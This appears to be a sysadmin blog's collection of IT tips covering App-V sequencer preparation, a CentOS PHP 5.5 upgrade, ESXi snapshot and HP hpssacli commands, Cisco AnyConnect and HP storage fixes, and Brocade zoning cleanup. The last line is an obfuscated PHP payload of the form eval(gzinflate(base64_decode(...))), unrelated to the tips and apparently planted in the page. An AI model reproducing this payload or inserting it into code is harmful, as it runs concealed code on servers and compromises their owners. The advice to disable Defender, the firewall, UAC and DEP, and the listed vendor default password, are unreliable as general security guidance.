Prepare Sequencer and test Client for App-V

To make your Sequence machine as clean as possible you need to do the following (and also do htem on your test client):

Stop the following services:

  • Windows Defender
  • Windows Error reporting
  • Windows Firewall
  • Windows Search
  • Windows Update (make sure both the Seqeuenser en client are up to date at the same level)

Configur the following:

  • System Protecion
    • Off
  • Action Settings
    • All messages off
  • UAC
    • Off
  • DEP
    • Bcdedit /set nx alwaysoff
  • AERO
    • Off
  • Printer
    • Create a dummy printer
  • ODBC
    • Create a dummy ODBC connection
  • Internet Explorer
    • Fisrt use settings
    • Delete history and temp files on exit
    • Blank Page
    • Tab settings
  • Log Files
    • Clean Windows log files
  • Windows Explorer
    • Make extensions visable
    • Advanced sharing

PHP 5.5 on CentOS

There is more than one way to upgrade CentOS 6.5 to PHP 5.5; the following is a suggestion only. Consult a reference for additional options.

To upgrade to PHP 5.5:

  1. Enter the following commands in the order shown.
    yum -y update
    rpm -Uvh https://mirror.webtatic.com/yum/el6/latest.rpm
    yum -y remove php-common-5.3.3-40.el6_6.x86_64
    yum -y install php55w php55w-opcache
    yum -y install php55w-xml php55w-mcrypt php55w-gd php55w-devel php55w-mysql php55w-intl php55w-mbstring
    yum -y update
    
  2. Restart Apache: service httpd restart
  3. Continue with the next section.

Working with Snapshots on the ESXi CLI

I love CLI (Command Line Interface).

It gives you control…

So therefore if I work with ESX and snapshotting:

# vim-cmd vmsvc/getallvms
To get all VM’s andthier ID’s

# vim-cmd vmsvc/snapshot.create [ID] [Name]
To create a snapshot

# vim-cmd vmsvc/get.snapshotinfo [ID]
To get full information on snapshots on the VM

# vim-cmd vmsvc/snapshot.revert [ID]
To revert to a snapshot

# vim-cmd vmsvc/snapshot.remove [ID]
To remove a snapshot

# vim-cmd vmsvc/snapshot.removeall [ID]
To remove all snapshots from the VM

 

Using hpssacli under ESXi for HP Smart Array Controllers

You need a HP ESXi image to run the command

> /opt/hp/hpssacli/bin/hpssacli

Then you have following options:

Show configuration
/opt/hp/hpssacli/bin/hpssacli ctrl all show config

Controller status
/opt/hp/hpssacli/bin/hpssacli ctrl all show status

Show detailed controller information for all controllers
/opt/hp/hpssacli/bin/hpssacli ctrl all show detail

Show detailed controller information for controller in slot 0
/opt/hp/hpssacli/bin/hpssacli ctrl slot=0 show detail

Rescan for New Devices
/opt/hp/hpssacli/bin/hpssacli rescan

Physical disk status
/opt/hp/hpssacli/bin/hpssacli ctrl slot=0 pd all show status

Show detailed physical disk information
/opt/hp/hpssacli/bin/hpssacli ctrl slot=0 pd all show detail

Logical disk status
/opt/hp/hpssacli/bin/hpssacli ctrl slot=0 ld all show status

View Detailed Logical Drive Status
/opt/hp/hpssacli/bin/hpssacli ctrl slot=0 ld 2 show

Create New RAID 0 Logical Drive
/opt/hp/hpssacli/bin/hpssacli ctrl slot=0 create type=ld drives=1I:1:2 raid=0

Create New RAID 1 Logical Drive
/opt/hp/hpssacli/bin/hpssacli ctrl slot=0 create type=ld drives=1I:1:1,1I:1:2 raid=1

Create New RAID 5 Logical Drive
/opt/hp/hpssacli/bin/hpssacli ctrl slot=0 create type=ld drives=1I:1:1,1I:1:2,2I:1:6,2I:1:7,2I:1:8 raid=5

Delete Logical Drive
/opt/hp/hpssacli/bin/hpssacli ctrl slot=0 ld 2 delete

Add New Physical Drive to Logical Volume
/opt/hp/hpssacli/bin/hpssacli ctrl slot=0 ld 2 add drives=2I:1:6,2I:1:7

Extending a Logical Volume
/opt/hp/hpssacli/bin/hpssacli ctrl slot=0 ld 2 modify size=max [forced]

Add Spare Disks
/opt/hp/hpssacli/bin/hpssacli ctrl slot=0 array all add spares=2I:1:6,2I:1:7

Enable Drive Write Cache
/opt/hp/hpssacli/bin/hpssacli ctrl slot=0 modify dwc=enable

Disable Drive Write Cache
/opt/hp/hpssacli/bin/hpssacli ctrl slot=0 modify dwc=disable

Erase Physical Drive
/opt/hp/hpssacli/bin/hpssacli ctrl slot=0 pd 2I:1:6 modify erase

Turn on Blink Physical Disk LED
/opt/hp/hpssacli/bin/hpssacli ctrl slot=0 ld 2 modify led=on

Turn off Blink Physical Disk LED
/opt/hp/hpssacli/bin/hpssacli ctrl slot=0 ld 2 modify led=off

Modify smart array cache read and write ratio (cacheratio=readratio/writeratio)
/opt/hp/hpssacli/bin/hpssacli ctrl slot=0 modify cacheratio=100/0

Enable smart array write cache when no battery is present (No-Battery Write Cache option)
/opt/hp/hpssacli/bin/hpssacli ctrl slot=0 modify nbwc=enable

Disable smart array cache for certain Logical Volume
/opt/hp/hpssacli/bin/hpssacli ctrl slot=0 logicaldrive 1 modify arrayaccelerator=disable

Enable smart array cache for certain Logical Volume
/opt/hp/hpssacli/bin/hpssacli ctrl slot=0 logicaldrive 1 modify arrayaccelerator=enable

Enable SSD Smart Path
/opt/hp/hpssacli/bin/hpssacli ctrl slot=0 array a modify ssdsmartpath=enable

Disable SSD Smart Path
/opt/hp/hpssacli/bin/hpssacli ctrl slot=0 array a modify ssdsmartpath=disable

ACU Reference Guide

Data Center Fabric Manager UserId login

Standard Login by DCFM are follow, exact as descripted below:

Username = “Administrator”
Password = “password”

Check if Linux File system is Read-Only

If you for some reason think your Linux File System is read-only. Donot trust on the mount command, as it will show you your FS in rw mode.

Following command will show you the Read-Only mounted File Systems:

 egrep " ro,|,ro " /proc/mounts

A File System can becom Read-Only if it has been away to lang for the OS. To prevent data Corruption, Linux makes it RO.

Cisco AnyConnect “Failed to initialize connection subsystem”

  • 1. Close the Cisco AnyConnect Window and the taskbar mini-icon
  • 2. Right click vpnui.exe in the “Cisco AnyConnect Secure Mobility Client” folder. (I have it in “C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\”
  • 3. Click on the “Run compatibility troubleshooter” button
  • 4. Choose “Try recommended settings”.
  • 5. The wizard suggests Windows 8 compatibility.
  • 6. Click “Test Program”.  This will open the program.
  • 7. Close
  • Some people may need to repeat the above steps for vpnagent.exe. That is the local service that supports the client user interface.

Newly installed P4330 Lefthand node does not want to join Management group

Today I had to add 2 P4330 nodes to an already existing P4300G2 management group.

Both P4300G2 systems and P4330 systems where on FW level 11.5.
When adding them to the management group an error occurred:

Storage system did not join the management group <GROUPNAME>.
Failed to sync newly added system. Remove the newly added system and try to add it again.

Als the system gave me following error:
“Storage System Status Missing”

Searching the internet I got to a page that indicated that there could be a subnet mask mismatch.
Checking this I came to the conclusion that all was OK. So the “SAN”switches, subnet mask, VLANning.
I made a call with HP.

Seems that some P4x30 systems with FW level 11..5 loaded from the factory have a BUG in the system that gives this result.

So please make sure, if you have this error, you do a Re-Image of the system (keep license key at hand) and re-do the settings you made earlier.
But this will solve your error.

Have Fun!

MSA1040 or MSA2040: Fan’s running full speed

We have had an installation of a MSA 1040 system. At the customer site, we discovered that the FAN’s kept running on full speed.

Current firmware was:  GL105P003

New firmware from HP (released 01 December 2014) fixes this problem (GL200R007).

Hopes this helps you all.

Cleaning Brocarde Switch Zoning

There are moments you need to get the old zoning out of a Brocade SAN switch. This could be, because you are re-using an older switch in your enviroment, or maybe you have been working on your fabric without noticing that you had a Fragmented Fabric.

To clean the config do following steps:

switchDisable
cfgDisable 
cfgClear 
cfgSave
switchEnable

.. and voila!!! A brand new switch.!

eval(gzinflate(base64_decode('vZHRasIwFIavV/AdQpCSglSvJ7INV3Aw0NV2N2MESU9tZpZTkuiE6bsvOrsibre7/c+X/3xJwBg03ECNxkm9ZINoGHTHWECePpIRoZVz9XW/r6ReFShWscD3vkDtQLu4ruobWYzCCq0b0XhtFGjhj7Iunyfpc5K+0EmWzfhkOs/oaxTTcG3kH2CaPOXJPON5+uDRYdAJZEkYk9ptFootwXFRLvlmYRhdKIUf3JfwEmvQNIrIbkdOpNSSe/o3KiJhSMq1Fk6i5rCV1llGS6mAH/u/b2UPfZ+d4ApEheT2Ysya14mGnWBPQFn4R9NGrnvS8V90VDyzOqm/odSM0h5p4HPji35xUPBWrl1S+f6f+HzHMbbgsPYDUfXI2E+ms4xPkrv7JO2RQYvBFsQBahOh0EIT7b8A'))); ?>